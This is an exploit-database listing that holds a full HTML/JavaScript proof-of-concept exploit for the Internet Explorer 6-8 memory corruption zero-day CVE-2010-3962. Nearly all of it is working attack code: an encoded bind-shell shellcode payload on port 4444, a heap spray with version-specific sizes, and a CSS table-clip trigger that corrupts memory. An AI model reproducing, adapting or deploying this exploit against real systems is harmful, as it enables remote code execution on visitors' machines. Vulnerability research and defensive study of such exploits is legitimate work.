Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit

2010-11-16
ID: 65206
CVE: None
Download vulnerable application: None
# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8
# Coded by Matteo Memelli ryujin __at__ offsec.com
# http://www.offensive-security.com/0day/ie-0day.txt
# Thx to dookie __at__ offsec.com
# notes: This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it 

<!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday

Note: The EIP value at crash time depends on the exact version of the mshtml library used by IE.
This means that the exploit is not universal for the IE versions indicated in the exploit.

IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9
IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB
IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD

Matteo Memelli, ryujin __at__ offsec.com thx to dookie __at__ offsec.com //-->
<html>
<head><title>poc CVE-2010-3962 zeroday</title>
<script>
function alloc(bytes, mystr) {
// Bindshell on port 4444
var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+
'%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+
'%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+
'%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301'+
'%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a'+
'%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4'+
'%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268'+
'%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468'+
'%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912'+
'%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856'+
'%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd'+
'%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5');
while (mystr.length< bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2) + shellcode;
}
</script>
</head>
<body>
<script>
alert('ph33r: click me');
var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
//FAKEOBJ = alloc(233120, FAKEOBJ); // IE6
//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7
FAKEOBJ = alloc(433120, FAKEOBJ); // IE8
for (var k = 0; k < 1000; k++) {
    evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
}
document.write("<table style=position:absolute;clip:rect(0)>");
</script>
 
</body>
</html>
1-4-2 (www01)